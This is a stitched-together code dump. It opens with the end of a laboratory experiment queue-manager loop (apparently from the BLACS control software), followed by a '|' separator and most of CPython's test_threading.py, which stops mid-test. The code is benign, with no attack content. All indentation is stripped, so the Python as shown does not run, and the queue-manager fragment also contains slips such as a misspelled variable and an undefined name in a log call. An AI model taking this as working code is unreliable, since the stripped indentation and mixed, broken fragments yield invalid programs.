# A Queue for event-based notification of when the experiment has finished.
experiment_finished_queue = queue.Queue()
logger.debug('About to start the master pseudoclock')
run_time = time.localtime()
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_starting'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
#TODO: fix potential race condition if BLACS is closing when this line executes?
self.BLACS.tablist[self.master_pseudoclock].start_run(experiment_finished_queue)
# Wait for notification of the end of run:
abort = False
restarted = False
done = False
while not (abort or restarted or done):
try:
done = experiment_finished_queue.get(timeout=0.5) == 'done'
except queue.Empty:
pass
try:
# Poll self.current_queue for abort signal from button or device restart
device_name, result = self.current_queue.get_nowait()
if (device_name == 'Queue Manager' and result == 'abort'):
abort = True
if result == 'restart':
restarted = True
# Check for error states in tabs
for device_name, tab in devices_in_use.items():
if self.get_device_error_state(device_name,devices_in_use):
restarted = True
except queue.Empty:
pass
if abort or restarted:
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# Disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
if restarted:
self.manager_paused = True
self.prepend(path)
self.set_status("Device restarted during run.\nAborted. Queue paused")
elif abort:
self.set_status("Aborted")
if abort or restarted:
# after disabling the abort button, we now start a new iteration
continue
logger.info('Run complete')
self.set_status("Saving data...", path)
# End try/except block here
except Exception:
logger.exception("Error in queue manager execution. Queue paused.")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except Exception:
repeat_numer = 0
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
# Need to put devices back in manual mode
self.current_queue = queue.Queue()
for devicename, tab in devices_in_use.items():
if tab.mode == MODE_BUFFERED or tab.mode == MODE_TRANSITION_TO_BUFFERED:
tab.abort_buffered(self.current_queue)
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
self.set_status("Error in queue manager\nQueue paused")
# disconnect and disable abort button
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE OVER! #
##########################################################################################################################################
finally:
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('science_over'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Transition to manual #
##########################################################################################################################################
# start new try/except block here
try:
with h5py.File(path,'r+') as hdf5_file:
self.BLACS.front_panel_settings.store_front_panel_in_h5(hdf5_file,states,tab_positions,window_data,plugin_data,save_conn_table=False, save_queue_data=False)
data_group = hdf5_file['/'].create_group('data')
# stamp with the run time of the experiment
hdf5_file.attrs['run time'] = time.strftime('%Y%m%dT%H%M%S',run_time)
error_condition = False
response_list = {}
# Keep transitioning tabs to manual mode and waiting on them until they
# are all done or have all errored/restarted/failed. If one fails, we
# still have to transition the rest to manual mode:
while stop_groups:
transition_list = {}
# Transition the next group to manual mode:
for name in stop_groups.pop(min(stop_groups)):
tab = devices_in_use[name]
try:
tab.transition_to_manual(self.current_queue)
transition_list[name] = tab
except Exception as e:
logger.exception('Exception while transitioning %s to manual mode.'%(name))
error_condition = True
# Wait for their responses:
while transition_list:
logger.info('Waiting for the following devices to finish transitioning to manual mode: %s'%str(transition_list))
try:
name, result = self.current_queue.get(2)
if name == 'Queue Manager' and result == 'abort':
# Ignore any abort signals left in the queue, it is too
# late to abort in any case:
continue
except queue.Empty:
# 2 seconds without a device transitioning to manual mode.
# Is there an error:
for name in transition_list.copy():
if self.get_device_error_state(name, transition_list):
error_condition = True
logger.debug('%s is in an error state' % name)
del transition_list[name]
continue
response_list[name] = result
if result == 'fail':
error_condition = True
logger.debug('%s failed to transition to manual' % name)
elif result == 'restart':
error_condition = True
logger.debug('%s restarted during transition to manual' % name)
elif self.get_device_error_state(name, devices_in_use):
error_condition = True
logger.debug('%s is in an error state' % name)
else:
logger.debug('%s finished transitioning to manual mode' % name)
# Once device has transitioned_to_manual, disconnect restart
# signal:
tab = devices_in_use[name]
inmain(tab.disconnect_restart_receiver, restart_function)
del transition_list[name]
if error_condition:
self.set_status("Error in transtion to manual\nQueue Paused")
except Exception as e:
error_condition = True
logger.exception("Error in queue manager execution. Queue paused.")
self.set_status("Error in queue manager\nQueue paused")
# Raise the error in a thread for visibility
zprocess.raise_exception_in_thread(sys.exc_info())
if error_condition:
# clean up the h5 file
self.manager_paused = True
# is this a repeat?
try:
with h5py.File(path, 'r') as h5_file:
repeat_number = h5_file.attrs.get('run repeat', 0)
except:
repeat_number = 0
# clean the h5 file:
temp_path = tempfilename()
self.clean_h5_file(path, temp_path, repeat_number=repeat_number)
try:
shutil.move(temp_path, path)
except Exception:
msg = ('Couldn\'t delete failed run file %s, ' % path +
'another process may be using it. Using alternate '
'filename for second attempt.')
logger.warning(msg, exc_info=True)
shutil.move(temp_path, path.replace('.h5','_retry.h5'))
path = path.replace('.h5','_retry.h5')
# Put it back at the start of the queue:
self.prepend(path)
continue
##########################################################################################################################################
# Analysis Submission #
##########################################################################################################################################
logger.info('All devices are back in static mode.')
# check for analysis Filters in Plugins
send_to_analysis = True
for callback in plugins.get_callbacks('analysis_cancel_send'):
try:
if callback(path):
send_to_analysis = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
# Submit to the analysis server
if send_to_analysis:
self.BLACS.analysis_submission.get_queue().put(['file', path])
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('shot_complete'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
##########################################################################################################################################
# Repeat Experiment? #
##########################################################################################################################################
# check for repeat Filters in Plugins
repeat_shot = self.manager_repeat
for callback in plugins.get_callbacks('shot_ignore_repeat'):
try:
if callback(path):
repeat_shot = False
break
except Exception:
logger.exception("Plugin callback raised an exception")
if repeat_shot:
if ((self.manager_repeat_mode == self.REPEAT_ALL) or
(self.manager_repeat_mode == self.REPEAT_LAST and inmain(self._model.rowCount) == 0)):
# Resubmit job to the bottom of the queue:
try:
message = self.process_request(path)
except Exception:
# TODO: make this error popup for the user
self.logger.exception('Failed to copy h5_file (%s) for repeat run'%s)
logger.info(message)
self.set_status("Idle")
logger.info('Stopping')
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import verbose, strip_python_stderr, import_module, cpython_only
from test.script_helper import assert_python_ok, assert_python_failure
import random
import re
import sys
_thread = import_module('_thread')
threading = import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, stopped -?\d+\)>',
repr(t)))
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
_thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256kB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1MB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertTrue(not t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertFalse('daemon' in repr(t))
t.daemon = True
self.assertTrue('daemon' in repr(t))
def test_deamon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
sys.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
self.addCleanup(t.join)
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertTrue(t._tstate_lock is None)
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
